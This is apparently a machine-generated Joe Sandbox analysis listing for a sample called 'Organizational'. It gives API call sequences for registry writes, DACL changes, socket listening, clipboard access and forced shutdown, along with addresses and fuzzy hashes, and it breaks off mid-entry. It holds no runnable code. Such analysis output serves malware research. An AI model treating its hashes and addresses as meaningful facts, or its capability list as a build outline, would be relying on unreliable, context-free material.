                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: e0a86bc9a5e939fa059b522a4d35749e05bec13e72c07eb8dc110670dd452592
                                                    • Instruction ID: 5ed9acb3f17b75228c0d7fa6d61e9014a1e5619a3453a235050cf984cb512bfd
                                                    • Opcode Fuzzy Hash: e0a86bc9a5e939fa059b522a4d35749e05bec13e72c07eb8dc110670dd452592
                                                    • Instruction Fuzzy Hash: 10A13DB2504308ABD710EFA4CD86DBFB7ECBF94705F400919F68596191EB34EA08DB62
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F5F5F9
                                                    • _wcscmp.LIBCMT ref: 00F5F60E
                                                    • _wcscmp.LIBCMT ref: 00F5F625
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F5F637
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F5F651
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F5F669
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F674
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F5F690
                                                    • _wcscmp.LIBCMT ref: 00F5F6B7
                                                    • _wcscmp.LIBCMT ref: 00F5F6CE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5F6E0
                                                    • SetCurrentDirectoryW.KERNEL32(00FAB578), ref: 00F5F6FE
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F5F708
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F715
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F727
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: d6cf969c3f69cadc56dce41bd40e061a73c305867a9228a55b53f4c6f9f70fd6
                                                    • Instruction ID: a8c8135fe93d137362472f3f1f2ade4f67155d2c89a644eaa0fdff4a8826f670
                                                    • Opcode Fuzzy Hash: d6cf969c3f69cadc56dce41bd40e061a73c305867a9228a55b53f4c6f9f70fd6
                                                    • Instruction Fuzzy Hash: B6318371A4121D6ADF109BA4AC4DAEE77AC9F09332F5401A5E904D21A0EF74DA8CEB64
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F70FB3
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F80980,00000000,?,00000000,?,?), ref: 00F71021
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F71069
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F710F2
                                                    • RegCloseKey.ADVAPI32(?), ref: 00F71412
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F7141F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: 2afbe5bad9135b87f88bd86cc920b84182a4ec5f475ac6a4abed708a76b54e1d
                                                    • Instruction ID: e27cd85c12a51ae4da9e1bcb9d0845d9a8a14565489615bd80918ff6ff6b136e
                                                    • Opcode Fuzzy Hash: 2afbe5bad9135b87f88bd86cc920b84182a4ec5f475ac6a4abed708a76b54e1d
                                                    • Instruction Fuzzy Hash: DF027E716006019FCB14EF28C841E6AB7E5FF89720F04855DF95A9B3A2CB35EC45DB92
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F5F756
                                                    • _wcscmp.LIBCMT ref: 00F5F76B
                                                    • _wcscmp.LIBCMT ref: 00F5F782
                                                      • Part of subcall function 00F54875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F54890
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F5F7B1
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F7BC
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F5F7D8
                                                    • _wcscmp.LIBCMT ref: 00F5F7FF
                                                    • _wcscmp.LIBCMT ref: 00F5F816
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5F828
                                                    • SetCurrentDirectoryW.KERNEL32(00FAB578), ref: 00F5F846
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F5F850
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F85D
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F86F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 3a11110d005350468ff92b3b6c463a550855f8418f07cfc3ab953ba7cf64a3fc
                                                    • Instruction ID: e7775f7db34835bbd7d09c00befb44f4cb26a173e7b7be40f27acfefdebb2820
                                                    • Opcode Fuzzy Hash: 3a11110d005350468ff92b3b6c463a550855f8418f07cfc3ab953ba7cf64a3fc
                                                    • Instruction Fuzzy Hash: B431D87294021DAADF109BB4EC4CAEE77AC9F09332F1401A5ED14A21E1DB70DE8DBB54
                                                    APIs
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F48E3C
                                                      • Part of subcall function 00F48E20: GetLastError.KERNEL32(?,00F48900,?,?,?), ref: 00F48E46
                                                      • Part of subcall function 00F48E20: GetProcessHeap.KERNEL32(00000008,?,?,00F48900,?,?,?), ref: 00F48E55
                                                      • Part of subcall function 00F48E20: HeapAlloc.KERNEL32(00000000,?,00F48900,?,?,?), ref: 00F48E5C
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F48E73
                                                      • Part of subcall function 00F48EBD: GetProcessHeap.KERNEL32(00000008,00F48916,00000000,00000000,?,00F48916,?), ref: 00F48EC9
                                                      • Part of subcall function 00F48EBD: HeapAlloc.KERNEL32(00000000,?,00F48916,?), ref: 00F48ED0
                                                      • Part of subcall function 00F48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F48916,?), ref: 00F48EE1
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F48931
                                                    • _memset.LIBCMT ref: 00F48946
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F48965
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F48976
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F489B3
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F489CF
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F489EC
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F489FB
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F48A02
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F48A23
                                                    • CopySid.ADVAPI32(00000000), ref: 00F48A2A
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F48A5B
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F48A81
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F48A95
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 79c0a2d762a91306a5e1d438d379183c3f1fbfddb8bbb980cf764ff799af78a2
                                                    • Instruction ID: e38815b82f5c65b2527bb5f12b0f38ce9da8733e3c092a42eb84eb2a96dc5672
                                                    • Opcode Fuzzy Hash: 79c0a2d762a91306a5e1d438d379183c3f1fbfddb8bbb980cf764ff799af78a2
                                                    • Instruction Fuzzy Hash: 15615A71900209BFDF01DF95EC49AFEBB79FF04354F04812AE815A6290DB759A06EB60
                                                    APIs
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F70B0C
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F70BAB
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F70C43
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F70E82
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F70E8F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: a15be1b3ed0df2ae193b54b4dfc760b61f6541c6ca596f0b8d237d7ff008d933
                                                    • Instruction ID: 9a3eb8ca3d91b345db22167407e76072361796b258b52cfb8cc42a67200b4bb3
                                                    • Opcode Fuzzy Hash: a15be1b3ed0df2ae193b54b4dfc760b61f6541c6ca596f0b8d237d7ff008d933
                                                    • Instruction Fuzzy Hash: 4BE15B71604214EFC714DF28C891E6BBBE5EF89714F04896DF84ADB2A1DB30E905EB52
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 00F54451
                                                    • __swprintf.LIBCMT ref: 00F5445E
                                                      • Part of subcall function 00F138C8: __woutput_l.LIBCMT ref: 00F13921
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F54488
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00F54494
                                                    • LockResource.KERNEL32(00000000), ref: 00F544A1
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00F544C1
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00F544D3
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00F544E2
                                                    • LockResource.KERNEL32(?), ref: 00F544EE
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F5454F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID:
                                                    • API String ID: 1433390588-0
                                                    • Opcode ID: a93b6f52a90c404cb8594c1d36f8f5a36487d150e3f4a4bcb0d963cd1e474db7
                                                    • Instruction ID: 833c66ecb336b6087d883f67f7bbff9e0b31d79f74f817f903aa9b9e83035e09
                                                    • Opcode Fuzzy Hash: a93b6f52a90c404cb8594c1d36f8f5a36487d150e3f4a4bcb0d963cd1e474db7
                                                    • Instruction Fuzzy Hash: 7B31C37190121AABCB119F60EC48AFF7BACEF04356F444425FE11D2150EB74E955EB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: 347918585db27819eee6ef52e6bf2d30181ee310e5e60a9430cd95e4b9fed5ae
                                                    • Instruction ID: 2fba5d19684866be7fbda111f1af0834704c9b55f1cd1e35edae7a520101ead4
                                                    • Opcode Fuzzy Hash: 347918585db27819eee6ef52e6bf2d30181ee310e5e60a9430cd95e4b9fed5ae
                                                    • Instruction Fuzzy Hash: F4218131641214AFDB51BF60EC49F7E7BA8EF84721F008019FA069B2A1DF75AD11AB94
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F5FA83
                                                    • FindClose.KERNEL32(00000000), ref: 00F5FB96
                                                      • Part of subcall function 00EF52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF52E6
                                                    • Sleep.KERNEL32(0000000A), ref: 00F5FAB3
                                                    • _wcscmp.LIBCMT ref: 00F5FAC7
                                                    • _wcscmp.LIBCMT ref: 00F5FAE2
                                                    • FindNextFileW.KERNEL32(?,?), ref: 00F5FB80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 2185952417-438819550
                                                    • Opcode ID: a402e9269216a1f8b8d14a9c96a472ed99511fdeb327a200d9a28afeaa649033
                                                    • Instruction ID: ff1e317cc20482afe97cb7dc309894882303e9cb647038abbd04dc7d36410f3d
                                                    • Opcode Fuzzy Hash: a402e9269216a1f8b8d14a9c96a472ed99511fdeb327a200d9a28afeaa649033
                                                    • Instruction Fuzzy Hash: FB419071D0021AEFDF14DF64CC59AEEBBB4FF05351F1481A5E914A22A1EB349A48EB50
                                                    APIs
                                                      • Part of subcall function 00F49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F493E3
                                                      • Part of subcall function 00F49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F49410
                                                      • Part of subcall function 00F49399: GetLastError.KERNEL32 ref: 00F4941D
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F557B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 3f9e153a3c79ee45c468be21fd2c0eebcc95ea6f764be1484076174df8a83f54
                                                    • Instruction ID: 54739065cc964e564a063be415ba5d1a7853d62022dab621c086c787d0356d81
                                                    • Opcode Fuzzy Hash: 3f9e153a3c79ee45c468be21fd2c0eebcc95ea6f764be1484076174df8a83f54
                                                    • Instruction Fuzzy Hash: 35014C71B4071EEAE72852B4BC6ABBB7758EB08F62F100015FE13D60D2D9545C0CB150
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F669C7
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F669D6
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F669F2
                                                    • listen.WSOCK32(00000000,00000005), ref: 00F66A01
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66A1B
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00F66A2F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: a58cda2bd764b45e603c914ca4de0124ae8dee4042143096fa32e0b1c4b745ed
                                                    • Instruction ID: 5ba909a58aaa772c0b9946f8198af4622a655c653e85a386c27b47b030e21a0e
                                                    • Opcode Fuzzy Hash: a58cda2bd764b45e603c914ca4de0124ae8dee4042143096fa32e0b1c4b745ed
                                                    • Instruction Fuzzy Hash: AE21CE71600208AFCB00EFA4CC89A7EB7E9EF44720F148558E916F72D1CB34AC05EB90
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EF1DD6
                                                    • GetSysColor.USER32(0000000F), ref: 00EF1E2A
                                                    • SetBkColor.GDI32(?,00000000), ref: 00EF1E3D
                                                      • Part of subcall function 00EF166C: DefDlgProcW.USER32(?,00000020,?), ref: 00EF16B4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 93dd1ef82fb523b71037e1f06b08b99a4e40041c2c7f530ad1710b565ffb91cb
                                                    • Instruction ID: fdc05cf7140b73eb67fbf3d4b4d4fadd84c99783c6847f8949996d394017e761
                                                    • Opcode Fuzzy Hash: 93dd1ef82fb523b71037e1f06b08b99a4e40041c2c7f530ad1710b565ffb91cb
                                                    • Instruction Fuzzy Hash: 44A17A7010951CFAD6286B299C49EFB36BDDF8131AF64518EFA01F6182CB269D01F372
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5C329
                                                    • _wcscmp.LIBCMT ref: 00F5C359
                                                    • _wcscmp.LIBCMT ref: 00F5C36E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F5C37F
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F5C3AF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 6c92936f7ebf8d559e6157553478b7911af846df2001c4ab0fed9f722eaf5547
                                                    • Instruction ID: f0508ae43172a163063130de50b7589198b3cee1f82b8bdb6ec571c9fc31dccf
                                                    • Opcode Fuzzy Hash: 6c92936f7ebf8d559e6157553478b7911af846df2001c4ab0fed9f722eaf5547
                                                    • Instruction Fuzzy Hash: CE518B75A047068FC714DF68C890EAAB7E4FF49321F104619EA56CB3A1DB30AD09EB91
                                                    APIs
                                                      • Part of subcall function 00F68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F684A0
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F66E89
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66EB2
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F66EEB
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66EF8
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00F66F0C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 545976cbe8d36fcb778eedf7ff6129038e0e3bd81037ed887d3ee20ba3cd0b26
                                                    • Instruction ID: ba3bd517b22c7b908cc20e3e120360b898d83ba9b2bb81989a8b86b26386d2cd
                                                    • Opcode Fuzzy Hash: 545976cbe8d36fcb778eedf7ff6129038e0e3bd81037ed887d3ee20ba3cd0b26
                                                    • Instruction Fuzzy Hash: 6341A1B6700218AFEB10AF64DC86F7F77E89B44714F048558FA16AB3D2DB719D009BA1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
